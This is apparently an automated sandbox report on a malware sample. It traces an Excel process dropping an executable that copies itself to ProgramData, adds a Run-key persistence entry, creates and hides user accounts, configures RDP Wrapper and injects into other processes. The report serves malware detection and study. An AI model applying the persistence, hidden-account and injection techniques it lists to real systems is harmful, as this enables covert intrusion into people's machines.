                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_0040FA42 LoadLibraryA,GetProcAddress,6_2_0040FA42
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_00401190 push eax; ret 6_2_004011A4
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_00401190 push eax; ret 6_2_004011CC
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_004144B1 push ebp; retf 6_2_00414564
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_00414550 push ebp; retf 6_2_00414564
                Source: asxhfzdhhz[1].exe.0.dr | Static PE information: section name: .text entropy: 7.983431389204728
                Source: VPZVQXDUT.exe.0.dr | Static PE information: section name: .text entropy: 7.983431389204728
                Source: msimages.exe.6.dr | Static PE information: section name: .text entropy: 7.983431389204728
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_0040D418 NetUserAdd,NetLocalGroupAddMembers,6_2_0040D418
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_004027D3 URLDownloadToFileW,ShellExecuteW,6_2_004027D3
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | File created: C:\ProgramData\msimages.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\asxhfzdhhz[1].exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | File created: C:\ProgramData\msimages.exe
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_0040AC0A lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,6_2_0040AC0A
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_0040A6C8 GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,6_2_0040A6C8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function: 6_2_0040D508 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,6_2_0040D508
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run msimages

                Hooking and other Techniques for Hiding and Protection

                Source: VPZVQXDUT.exe, 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: VPZVQXDUT.exe, 00000004.00000002.370971406.0000000003C6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: VPZVQXDUT.exe, 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: VPZVQXDUT.exe, 00000004.00000002.370788761.0000000002789000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: VPZVQXDUT.exe, 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: VPZVQXDUT.exe, 00000004.00000002.370788761.0000000002391000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: VPZVQXDUT.exe | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: VPZVQXDUT.exe, 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: VPZVQXDUT.exe, 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: msimages.exe, 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: msimages.exe, 0000000B.00000002.377093347.0000000002998000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: msimages.exe, 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: msimages.exe, 0000000B.00000002.377093347.00000000029B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: msimages.exe, 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: msimages.exe, 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: msimages.exe, 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: msimages.exe, 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | File opened: C:\ProgramData\msimages.exe:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (36 identical events)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Process information set: NOOPENFILEERRORBOX (23 identical events)
Source: C:\ProgramData\msimages.exe | Process information set: NOOPENFILEERRORBOX (40 identical events)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Memory allocated: 1A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Memory allocated: 2390000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Memory allocated: 360000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Memory allocated: 4B40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Memory allocated: 4910000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Memory allocated: 5E30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Memory allocated: 6E30000 memory reserve | memory write watch
Source: C:\ProgramData\msimages.exe | Memory allocated: 440000 memory reserve | memory write watch
Source: C:\ProgramData\msimages.exe | Memory allocated: 25C0000 memory reserve | memory write watch
Source: C:\ProgramData\msimages.exe | Memory allocated: 5B0000 memory reserve | memory write watch
Source: C:\ProgramData\msimages.exe | Memory allocated: 4C90000 memory reserve | memory write watch
Source: C:\ProgramData\msimages.exe | Memory allocated: 4890000 memory reserve | memory write watch
Source: C:\ProgramData\msimages.exe | Memory allocated: 5C90000 memory reserve | memory write watch
Source: C:\ProgramData\msimages.exe | Memory allocated: 6C90000 memory reserve | memory write watch
Source: C:\ProgramData\msimages.exe | Memory allocated: 1C0000 memory reserve | memory write watch
Source: C:\ProgramData\msimages.exe | Memory allocated: 25C0000 memory reserve | memory write watch
Source: C:\ProgramData\msimages.exe | Memory allocated: B60000 memory reserve | memory write watch
Source: C:\ProgramData\msimages.exe | Memory allocated: 4BB0000 memory reserve | memory write watch
Source: C:\ProgramData\msimages.exe | Memory allocated: 5BB0000 memory reserve | memory write watch
Source: C:\ProgramData\msimages.exe | Memory allocated: 5CE0000 memory reserve | memory write watch
Source: C:\ProgramData\msimages.exe | Memory allocated: 6CE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_0040DA5B: OpenSCManagerW, EnumServicesStatusExW, EnumServicesStatusExW, GetLastError, CloseServiceHandle, OpenSCManagerW, lstrcmpW
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\msimages.exe | Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\msimages.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) [graph_6-12006]
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe TID: 3628 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe TID: 3576 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe TID: 3604 | Thread sleep count: 60 > 30
Source: C:\ProgramData\msimages.exe TID: 3716 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\msimages.exe TID: 3736 | Thread sleep count: 60 > 30
Source: C:\ProgramData\msimages.exe TID: 3736 | Thread sleep count: 54 > 30
Source: C:\ProgramData\msimages.exe TID: 3736 | Thread sleep time: -270000s >= -30000s
Source: C:\ProgramData\msimages.exe TID: 2520 | Thread sleep time: -60000s >= -30000s
Source: C:\ProgramData\msimages.exe TID: 3748 | Thread sleep count: 60 > 30
Source: C:\ProgramData\msimages.exe TID: 3848 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\msimages.exe TID: 3868 | Thread sleep count: 60 > 30
Source: C:\ProgramData\msimages.exe | Last function: Thread delayed
Source: C:\ProgramData\msimages.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_00409DF6: GetFullPathNameA, PathCombineA, PathCombineA, FindFirstFileA, PathCombineA, PathCombineA, FindNextFileA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_0040FF27: FindFirstFileW, FindNextFileW
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_0041002B: GetLogicalDriveStringsW, GetLogicalDriveStringsW, GetDriveTypeW
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\msimages.exe | Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\msimages.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | API call chain: ExitProcess graph end node [graph_6-9227]
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | API call chain: ExitProcess graph end node [graph_6-10895]
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Process queried: DebugPort
Source: C:\ProgramData\msimages.exe | Process queried: DebugPort
Source: C:\ProgramData\msimages.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_0040FA42: LoadLibraryA, GetProcAddress
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_0041094E: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_00419172: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_00410619: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_00410620: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_00401085: GetProcessHeap, RtlAllocateHeap
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Process token adjusted: Debug
Source: C:\ProgramData\msimages.exe | Process token adjusted: Debug
Source: C:\ProgramData\msimages.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

Source: 4.2.VPZVQXDUT.exe.720000.0.raw.unpack, BsvVhpCbxDo.cs | .Net Code: TeAiTwzrmZn contains injection code
Source: 4.2.VPZVQXDUT.exe.720000.0.raw.unpack, BrzJShYQfEn.cs | .Net Code: TdEVEpVfUam contains injection code
Source: 4.2.VPZVQXDUT.exe.720000.0.raw.unpack, WiVLTGXGqZY.cs | .Net Code: oUaYGOUWfvW contains injection code
Source: 4.2.VPZVQXDUT.exe.720000.0.raw.unpack, BsvVhpCbxDo.cs | Reference to suspicious API methods: OlSVdbZdJVXOVw<tQuiNW>("kernel32", "VirtualAllocEx")
Source: 4.2.VPZVQXDUT.exe.720000.0.raw.unpack, BsvVhpCbxDo.cs | Reference to suspicious API methods: OlSVdbZdJVXOVw<yCUTOQ>("ntdll", "NtWriteVirtualMemory")
Source: 4.2.VPZVQXDUT.exe.720000.0.raw.unpack, BsvVhpCbxDo.cs | Reference to suspicious API methods: OlSVdbZdJVXOVw<efnUBk>("ntdll", "NtSetContextThread")
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_004079E8: OpenProcess, VirtualAllocEx, VirtualProtectEx, VirtualAllocEx, WriteProcessMemory, WriteProcessMemory, CreateRemoteThread
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_00411FD8: RegSetValueExA, OpenProcess, GetCurrentProcessId, GetModuleFileNameA, VirtualAllocEx, VirtualAllocEx, WriteProcessMemory, WriteProcessMemory, VirtualProtectEx, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Memory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\msimages.exe | Memory written: C:\ProgramData\msimages.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\msimages.exe | Memory written: C:\ProgramData\msimages.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\msimages.exe | Memory written: C:\ProgramData\msimages.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_004120B8: RegSetValueExA, CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle, explorer.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Process created: C:\ProgramData\msimages.exe "C:\ProgramData\msimages.exe"
Source: C:\ProgramData\msimages.exe | Process created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exe
Source: C:\ProgramData\msimages.exe | Process created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exe
Source: C:\ProgramData\msimages.exe | Process created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exe
Source: C:\ProgramData\msimages.exe | Process created: C:\ProgramData\msimages.exe C:\ProgramData\msimages.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_004118BA: InitializeSecurityDescriptor, SetSecurityDescriptorDacl, RegCreateKeyExA, RegCloseKey, SetLastError
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_0040F56D: AllocateAndInitializeSid, LookupAccountSidW, GetLastError, FreeSid
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe | Code function 6_2_0040F93F: cpuid
